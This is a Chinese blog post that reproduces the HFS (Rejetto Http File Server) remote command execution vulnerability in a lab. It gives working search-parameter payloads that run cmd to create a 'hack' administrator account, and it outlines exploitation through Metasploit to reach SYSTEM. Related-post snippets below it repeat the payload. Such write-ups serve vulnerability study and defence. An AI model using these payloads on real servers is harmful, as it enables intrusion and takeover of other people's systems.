远程执行_HFS远程命令执行漏洞复现

最新推荐文章于 2024-09-14 14:24:20 发布
最新推荐文章于 2024-09-14 14:24:20 发布
阅读量331 收藏
点赞数
文章标签: 远程执行
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42315338/article/details/112710094
版权
本文介绍了在Windows Server 2003和Windows 10上复现HFS远程命令执行漏洞的过程。在Windows 10中需以管理员权限执行。提供了漏洞程序下载链接,展示了web服务界面及搜索处的漏洞。详细步骤包括手工利用payload添加管理员账户,开启3389端口,以及使用msf模块进行利用,最终成功获取system权限。
摘要由CSDN通过智能技术生成

这里说一下,在Windows server 2003中复现时,我直接使用Administrator用户登录,然后复现,未出现权限问题。再Windows 10中尝试复现时发现权限不足,需要以管理员权限执行漏洞程序。

漏洞程序下载地址见评论

运行程序截图如下

f67e2c7221877b250395a2ec5a0192c4.png

尝试访问该软件提供的web服务

88931775fe5dabbd78f3ebd0b22c00cd.png

web服务是这个样子的,这个web服务的搜索处存在漏洞

一、手工利用

payload如下

http://127.0.0.1/?search==%00{.exec|cmd /c 此处替换为dos命令.} http://127.0.0.1/?search==%00{.exec|cmd /c 此处替换为dos命令.}12

完整利用过程如下使用如下payload添加一个管理员账户

http://127.0.0.1/?search==%00{.exec|cmd /c net user hack 123 /add.} 1

添加用户:hack密码:123

1ed42dd1d6d280247ac997d50a9ccace.png

将用户hack添加到Administrators组。

http://127.0.0.1/?search==%00{.exec|cmd /c net localgroup Administrators hack /add.}1
f4daf8b82e3d77ef7a6e1d4b02c2ca86.png

开启3389远程端口

11973adedd1f493506d96fdde1265018.png

使用远程连接工具连接,连接成功。

bbee688e4a0f9006ac8573be8924e3f8.png

2、使用msf利用

启动Metasploit,搜索hfs漏洞利用模块

c93e58122fb48bb587c311c7d6eb29d7.png

加载模块,并设置目标IP

83de6b8b1c857e1ac03635a7c499d433.png

设置payload,以及本机IP

4cdf640acc0ff381bcdd6829ded3c3a8.png

开始执行

30e42f46166ae3bba1024384f4d74297.png

成功获得system权限

e2a03cdbc8b0fb161dc35e52153d1eb6.png
Mjohfspjt
关注
HFS远程命令执行漏洞复现
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
05-28 5861
漏洞程序下载地址:Http File Server 这里说一下,再Windows server 2003中复现时,我直接使用Administrator用户登录,然后复现,未出现权限问题。再Windows 10中尝试复现时发现权限不足,需要以管理员权限执行漏洞程序。 运行程序截图如下 尝试访问该软件提供的web服务 web服务是这个样子的,这个web服务的搜索处存在漏洞 一、手工利用 payload如下 http://127.0.0.1/?search==%00{.exec|cmd /c 此处替换为dos
HFS远程命令执行漏洞入侵抓鸡黑阔服务器
aiquan9342的博客
12-24 1473
先来科普一下: HFS是什么? hfs网络文件服务器 2.3是专为个人用户所设计的HTTP档案系统,如果您觉得架设FTP Server太麻烦,那么这个软件可以提供您更方便的网络文件传输系统,下载后无须安装,只要解压缩后执行 hfs.exe,于「Virtual File System(虚拟档案系统)」窗格下按鼠标右键,即可新增/移除虚拟档案资料夹,或者直接将欲加入的档案拖曳至此窗口,便...
远程代码执行漏洞(RCE)分析与复现
最新发布
ABUG
09-14 622
这种漏洞通常出现在没有对输入数据进行严格过滤和验证的情况下,允许恶意用户发送特制的输入,使服务器执行未授权的命令或程序。远程代码执行漏洞的严重性不言而喻,攻击者可以通过未受控的输入执行恶意命令,直接控制服务器或获取敏感信息。我们将使用常见的Web应用程序漏洞示例,来展示一个典型的RCE漏洞的发现与利用过程。RCE的危害性非常高,攻击者可以直接接管服务器,执行恶意代码,访问敏感数据,或进行更多的破坏性操作。提交恶意输入后,如果漏洞存在,页面会返回两条命令的结果:ping 命令的结果和 ls 命令的结果。
CVE-2024-23692:Rejetto HFS 2.x 远程代码执行漏洞[附POC]
薛定谔嘚喵博客
06-14 1737
Rejetto HTTP文件服务器是一个轻量级的HTTP服务器软件,它允许用户在本地计算机上快速搭建一个文件共享服务。2024年6月,互联网上披露其 2.x系列 存在CVE-2024-23692 远程代码执行漏洞,该漏洞源于存在模板注入漏洞,允许远程未经身份验证的攻击者通过发送特制的HTTP请求在受影响的系统上执行任意命令
HFS文件服务器RCE 漏洞复现(CVE-2024-23692)
huangyongkang666的博客
06-11 3507
Rejetto HFS是一款简单易用的Web文件服务器,可通过网络或互联网共享文件。该软件创建了一个Web界面,让用户可以直接在运行HFS软件的机器上上传或下载文件,在最新的Rejetto HTTP文件服务器(HFS)2.x版本中,发现了一个严重的安全漏洞,标记为CVE-2024-23692HFS 版本 2.4.0 RC7 和 2.3mCVE-2024-23692漏洞特别影响 HFS 版本 2.4.0 RC7 和 2.3m。根本原因在于服务器处理用于呈现 HTTP 响应的默认模板的方式。
HFS修复漏洞
09-20
HFS修复漏洞
hfs.zip_HFS大气简约模板_hfs_hfs 模板_hfs2.3m模板_wantzuv
09-15
这款模板名为"hfs.zip_HFS大气简约模板_hfs_hfs 模板_hfs2.3m模板_wantzuv",由wantzuv可能参与制作,特别适用于HFS 2.3m版本。 HFS(Http File Server)的核心功能包括: 1. 文件上传与下载:用户可以通过网页...
hfs.zip_HFS template_HFS怎么编写_hfs 模板_hfs制作模板_hfs模版下载
09-24
HFS(Hierarchical File System,分层文件系统)是一种基于Web的文件服务器系统,由Remy Sharp开发,主要用于创建个人网站或本地网络共享文件。它以其简单易用、功能丰富的特性受到许多用户的喜爱。HFS模板是这个...
hfs-zh_hans_hfs登录模板_HFS模板_hfs默认模板_hfs配置模板_hfs_
10-02
在默认情况下,HFS使用英文界面,但为了更好地适应中文用户的需求,存在专门的汉化模板,使得中文用户在使用过程中更加便捷。本文将深入探讨HFS的登录模板、默认模板、配置模板及其应用。 首先,HFS的登录模板是...
hfs.rar_HFS code_hfs
09-24
标签"hfs_code"和"hfs"进一步强调了这个压缩包的内容与HFS文件系统及其相关的编程代码有关。这些标签可以帮助开发者或者研究人员快速找到与HFS相关的资源。 从压缩包子文件的文件名称列表来看,只有一个名为"hfs"的...
HFS远程命令执行漏洞(RCE)
weixin_30527323的博客
03-20 3323
一、HFS漏洞 1、影响版本 : 2.3c以前的2.3x版本 2、HFSHFS是HTTP File Server,国外的一款HTTP 文件服务器软件,简单易上手。 3、漏洞描述: HTTP File Server是一款专为个人用户所设计的HTTP文件服务器,它提供虚拟档案系统,支持新增、移除虚拟档案资料夹等。 Rejetto HTTP File Server 2.3c及之前版本中的...
HFS2.3漏洞利用.rar
12-28
很多用HFS当做建议下载程序 但有高危的代码审核问题。 可以添加管理员账户,密吗。 并且开启3389端口
红泪HFS提权
06-03
HFS提权工具
强力提权工具 CN 巴西烤肉 CMD HFS 全套
03-31
强力提权工具 CN 巴西烤肉 CMD HFS 全套
HFS 2.3x 远程命令执行(抓鸡黑客末日)
weixin_34015566的博客
09-15 772
从某论坛看见的,转载部分: 这个程序在国内用的特别多,特别是那些抓肉鸡的黑阔。 http://localhost:80/?search==%00{.exec|cmd.} http://localhost:80/search=%00{.exec|cmd.} 注:有些版本search前面是没有?的。 测试部分: 百度搜HFS默认就是2.3x版本,执行echo测试成功: ht...
漏洞利用-(HFS-RCE远程命令执行)
my的博客
07-04 1444
概念验证是对某些想法的一个较短而不完整的实现,以证明其可行性,示范其原理,其目的是为了验证一些概念或理论。概念验证通常被认为是一个有里程碑意义的实现的原型。在计算机安全术语中,概念验证经常被用来作为0day、exploit的别名。
HFS Cmd执行漏洞入侵与防御
u010005482的专栏
09-19 5709
最近爆出了HFS(Http File Server)爆出了这个漏洞
Apache OFBiz 路径遍历导致RCE漏洞
weixin_43167326的博客
06-05 676
WordPress CMS 上的网站数以亿计,该平台及其用户称为威胁行动者的庞大攻击面,因此常常是恶意攻击的目标。其中很多攻击通过插件安装恶意软件,轻松导致数千个甚至数百万个站点易遭攻击。攻击者还倾向于快速利用WordPress 中发现的漏洞
SSRF利用HFS远程命令执行漏洞(RCE)
qq_45884775的博客
04-09 5107
0x00SSRF漏洞介绍: SSRF漏洞(服务器端请求伪造):是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。(正是因为它是由服务端发起的,所以它能够请求到与它相连而与外网隔离的内部系统)。 0x01SSRF漏洞原理: SSRF形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能且没有对目标地址做过滤与限制。比如从指定URL地址获取网页文本内容,加载指定地址的图片,下载等等。利用的是服务端的请求伪造。SSRF是利用存在缺陷的we
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值